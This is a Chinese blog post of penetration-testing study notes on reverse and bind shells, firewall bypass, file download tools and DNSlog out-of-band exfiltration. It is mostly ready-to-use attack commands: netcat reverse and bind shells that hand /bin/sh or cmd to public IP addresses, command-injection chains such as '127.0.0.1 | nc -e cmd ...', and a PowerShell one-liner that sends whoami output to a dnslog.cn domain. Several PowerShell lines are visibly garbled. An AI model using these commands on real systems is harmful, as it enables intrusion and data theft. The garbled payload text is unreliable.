五、反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

已于 2023-07-02 09:10:05 修改
阅读量183 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 安全 计算机网络
于 2023-07-02 08:51:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73569293/article/details/131497835
版权

#常规基本渗透命令详解
https://blog.csdn.net/weixin_43303273/article/details/83029138

#实用案例1:文件上传下载-解决无图形化&解决数据传输
文件需传到网站目录
记得结束apache进程,会占用端口
提前用浏览器直接访问测试文件是否在目录中
命令生成:https://forum.ywhack.com/bountytips.php?download
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
Nc在Linux上自带,Windows上不自带。
能将对方权限直接传到自己的电脑
命令生成:https://forum.ywhack.com/shell.php
1、正向连接:本地监听等待对方连接
Linux控制Windows
//绑定CMD到本地5566端口
nc -e cmd -lvvp 5566
//主动连接目标5566
ncat 47.122.23.131 5566

Windows控制Linux
//绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 47.94.236.117 5566
(需要Linux和Windows在同一局域网)
2、反向连接:主动给出去,对方监听
//绑定SH到目标5566端口
ncat -e /bin/sh 47.122.23.131 5566(多了一个对方的IP地址)
//等待5566连接
nc -lvvp 5566

//绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566(需要Linux有公网IP ,不然Linux与Windows需要在同一个局域网下
//等待5566连接
ncat -lvvp 5566

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
1、Linux服务器上搭建Tomcat,注意端口是8080
2、注意tomcat的文件目录
3、利用宝塔搭建网站,在本机操作Windows服务器
4、宝塔会拦截函数、使用小皮时出现乱码,重新安装后成功
管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && (特有和;)
例子:
ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 whoami

1、判断windows
2、windows没有自带的nc
3、想办法上传nc 反弹权限
4、反弹
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566
开启出站策略,采用正向连接
防火墙开启后入站规则更加严苛,只能使用默认通讯端口,除非添加规则
Linux:ncat -e cmd 47.122.23.131 5566
Windows:127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog
1、dnslog.cn
2 、ping whoami.gcuaukgu.com
3\此方法只能在Linux服务器上使用,因为Windows服务器不支持此拼接方法
4、故使用powershell命令,将数据能够带
出站入站都开启策略(数据不回显):OSI网络七层
127.0.0.1 | powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.f4an93.dnslog.cn’; z = z= z=x+$y;ping $z

漏洞有,但是数据不回显:
1、反弹shell
2、带外查询

确定能执行命令
windows
ping命令可绕过防火墙,因为其走的都是icmp协议,防火墙过滤的是tcp和udp
;

ping 127.0.0.1 |

为什么要这样写
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行

powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z

127.0.0.1 | powershell x = v e r ; x=ver; x=ver;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z

小奇哥呀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
正向shell和反弹shell
weixin_45936149的博客
03-26 9335
正向shell反弹shell的利用场景以及使用技巧
反弹Shell原理与实现
m0_62451321的博客
11-14 3091
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
ICMP查询Dnslog
AlunXZhou的博客
03-28 461
ping -c 1 /127.0.0.1 || whoami(前为假,输出后命令,否则不输出后命令)ping -c 1 127.0.0.1 && whoami(前命令必须为真,否则后命令不输出)管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)ping -c 1 127.0.0.1;ping -c 127.0.0.1 `whoami` (反引号为报错输出)ping -c 1 127.0.0.1 | whoami(只输出后命令)| || & && ``(特有``和;
内网渗透---反弹shell详解(内有各种姿势的详细过程)
weixin_45588247的博客
04-08 3165
声明:文章技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可用于 违法犯罪,一经发现直接上报国家安全机关处理. 反弹shell 反弹shell: 在攻击者机器获得受害者机器的命令行。 文章目录反弹shell背景:正向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:反向反弹shell:目的:前提:实验环境:网络拓扑:实验步骤:其他方式反弹shell:msf反弹:实验环境:实验步骤:bash反弹:实验环境:实验步骤:python反弹:实验环境:实验步骤:php反弹:实验环境:实验步骤:p.
web安全学习笔记【05】——反弹Shell、正反向连接
weixin_42090431的博客
01-21 1124
命令生成:https://forum.ywhack.com/bountytips.php?ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)命令生成:https://forum.ywhack.com/shell.php。windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等。安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等。
TCP&UDP;测试工具 V1.02 和 Ping 测试工具(ATKKPING)
12-11
在IT行业中,网络通信是至关重要的一个环节,无论是日常的互联网浏览、文件传输还是服务器间的交互,都离不开TCP和UDP这两种传输层协议。本篇将详细介绍"TCP&UDP测试工具 V1.02"和"Ping测试工具(ATKKPING)"的相关...
解决element ui select下拉框不回显数据问题的解决
10-17
解决Element UI的`el-select`下拉框不回显数据的问题,关键在于检查数据类型、数据结构以及数据加载的时机。通过调试和比对,找出问题的根源,针对性地进行修复。在实际开发中,保持良好的编程习惯,如正确处理数据...
ajax实现文件异步上传并回显文件相关信息功能示例
10-18
主要介绍了ajax实现文件异步上传并回显文件相关信息功能,结合实例形式分析了基于jQuery $.ajax方法的文件异步上传以及后台java程序对文件信息的读取与显示相关操作技巧,需要的朋友可以参考下
bash脚本输入密码不回显问题的解决方法
09-15
编写一个bash脚本时,需要用户输入一个密码,方可继续后续流程,但是又要保证用户输入的密码不会被别人看到,因此排除了通过参数将密码传入脚本的方案
反弹shell的正向连接和反向连接
qq_44833342的博客
05-29 378
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2000
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell)
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5788
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
【应急响应】————6、反弹shell+redis
Fly_鹏程万里
02-22 627
0x01 背景 2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。 0x02 排查过程 ps查看进程,发现端口反弹行为 查看进程启动时间发现为Feb 27,启动账户为Root。 查看/sbin /usr/bin /usr/sbin /bin 发现sshd Mtime为Feb 27,可以确认此时的SSH已经被植入后门,一般的SSH后门比较容易发现,功能如下: 1)如果...
Linux反弹shell姿势汇总
isxiaole的博客
08-10 623
1、netcat反弹shell 目前,默认的各个linux发行版本已经自了netcat工具包,但是可能由于处于安全考虑原生版本的netcat有可以直接发布与反弹本地shell的功能参数 -e 都被阉割了,所以我们需要自己手动下载二进制安装包,安装的如下: wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz tar -xvzf netcat-0.7.1.tar.gz ./configure
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8322
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 541
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
绝区肆--2024 年AI安全状况
最新发布
RamendeusStudio的博客
07-07 371
随着人工智能系统变得越来越强大和普及,与之相关的安全问题也越来越多。让我们来看看 2024 年人工智能安全的现状——评估威胁、分析漏洞、审查有前景的防御策略,并推测这一关键领域的未来可能如何。
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 263
亚信安全发布2024年6月威胁态势
回显时不让他显示&nbsp
07-15
如果你想在回显时不让` `显示为非断行空格,你可以使用HTML中的普通空格字符(ASCII码中的空格字符)来代替。 例如,你可以将` `替换为普通空格字符。以下是一个示例: ```html <!DOCTYPE html> 显示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值